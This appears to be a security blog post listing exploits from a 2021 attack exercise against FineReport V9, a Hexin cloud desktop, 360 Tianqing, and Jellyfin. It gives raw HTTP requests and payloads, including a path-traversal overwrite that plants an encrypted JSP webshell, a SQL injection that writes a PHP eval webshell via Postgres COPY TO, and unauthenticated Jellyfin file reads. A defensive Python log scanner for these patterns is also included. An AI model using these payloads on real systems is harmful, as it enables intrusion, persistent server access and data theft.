S1xHcL's Blog.

2021-HW

2021/04/08

帆软 (FineReport) V9 getshell

This vulnerability is an arbitrary file overwrite. To upload a JSP webshell, an existing JSP file has to be located and overwritten.

For example, once FineReport is running under Tomcat, a JSP file exists by default at /tomcat-7.0.96/webapps/ROOT/index.jsp; overwrite the index.jsp in Tomcat's own ROOT directory:

POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: 192.168.169.138:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
Connection: close
Accept-Au: 0c42b2f264071be0507acea1876c74
Content-Type: text/xml;charset=UTF-8
Content-Length: 675
{"__CONTENT__":"<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter(\"pass\")!=null){String k=(\"\"+UUID.randomUUID()).replace(\"-\",\"\").substring(16);session.putValue(\"u\",k);out.print(k);return;}Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec((session.getValue(\"u\")+\"\").getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>","__CHARSET__":"UTF-8"}

和信创天 (Hexin Chuangtian) cloud desktop command execution

POST /Upload/upload_file.php?l=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Referer: x.x.x.x
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 164

------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/avif

1
------WebKitFormBoundaryfcKRltGv--

360天擎 (360 Tianqing)

Unauthorized access

https://192.168.24.196:8443//api/dbstat/gettablessize

Front-end (unauthenticated) SQL injection

Writing a shell through the injection:

https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;--

Exploitation process:

  1. Installations done through the installer package generally run with root privileges, so this injection point can be used to try writing a shell
  2. Through the injection point, create a table O
  3. Give table O a new column T and write the shell contents into it
  4. The Postgres database uses COPY TO to copy the entire contents of a table to a file (this completes the shell write)
  5. Drop table O

Webshell path: https://192.168.24.196:8443/1.php

Jellyfin arbitrary file read

Only applies to Windows

# Unauthenticated download (database file: jellyfin.db)
GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1

# Unauthenticated arbitrary file read (database file: jellyfin.db)
GET /Videos/anything/hls/m/..%5Cdata%5Cjellyfin.db HTTP/1.1

# Unauthenticated arbitrary file read (database file: jellyfin.db)
GET /Videos/anything/hls/..%5Cdata%5Cjellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1

# Unauthenticated download of an arbitrary image (assuming the image path is c:\temp\filename.jpg)
GET /Images/Ratings/c:%5ctemp/filename HTTP/1.1
GET /Images/Ratings/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5ctemp/filename HTTP/1.1

Arbitrary file overwrite, requires administrator privileges

POST /Videos/d7634eb0064cce760f3f0bf8282c16cd/Subtitles HTTP/1.1
...
X-Emby-Authorization: MediaBrowser DeviceId="...", Version="10.7.0", Token="..."
...

{"language":".\\..\\","format":".\\..\\test.bin","isForced":false,"data":"base64 encoded data"}
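
As an added defender-side example (not part of the original post), the following Python scans constructed web-access-log lines for the request patterns documented above: directory traversal in the FineReport filePath parameter and in the Jellyfin HLS paths (including the %5C-encoded backslash form), the Postgres COPY ... TO file write carried in the 360天擎 query string, and calls to the unauthenticated /api/dbstat/ endpoint. The log lines, client addresses and indicator names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page's author); request targets
# mirror the patterns described above, client addresses are documentation space.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Apr/2021:10:00:01 +0800] "POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1" 200 12
192.0.2.11 - - [08/Apr/2021:10:00:02 +0800] "GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1" 200 40960
192.0.2.12 - - [08/Apr/2021:10:00:03 +0800] "GET /api/dp/rptsvcsyncpoint?ccid=1';create%20table%20O(T%20TEXT);copy%20O(T)%20to%20'C:%5Cwww%5C1.php';-- HTTP/1.1" 200 5
192.0.2.13 - - [08/Apr/2021:10:00:04 +0800] "GET /Videos/abc/hls/main.m3u8 HTTP/1.1" 200 300
192.0.2.14 - - [08/Apr/2021:10:00:05 +0800] "GET /api/dbstat/gettablessize HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3})')
# Postgres "COPY <table>(...) TO '<file>'" inside a query string is a file-write primitive.
COPY_TO_RE = re.compile(r"\bcopy\s+\w+\s*(\([^)]*\))?\s*to\s*'", re.IGNORECASE)
SENSITIVE_PREFIXES = ("/api/dbstat/",)  # unauthenticated data-exposure endpoint named above

def normalize(target: str) -> str:
    """Percent-decode until stable (catches double encoding), then fold '\\' into '/'."""
    prev = None
    while prev != target:
        prev, target = target, unquote(target)
    return target.replace("\\", "/").lower()

def classify(target: str) -> list:
    """Return the indicator names that match one request target."""
    t = normalize(target)
    hits = []
    if "../" in t:
        hits.append("path-traversal")
    if COPY_TO_RE.search(t):
        hits.append("sqli-copy-to-file")
    if t.startswith(SENSITIVE_PREFIXES):
        hits.append("sensitive-api")
    return hits

def scan_log(text: str) -> list:
    """Return (client_ip, method, target, indicators) for every suspicious line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, method, target, _status = m.groups()
        hits = classify(target)
        if hits:
            findings.append((ip, method, target, hits))
    return findings

if __name__ == "__main__":
    for ip, method, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {method} {target[:60]} -> {', '.join(hits)}")
```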

泛微 (Weaver) OA

A8 front-end (unauthenticated) SQL injection

A9 front-end unrestricted getshell
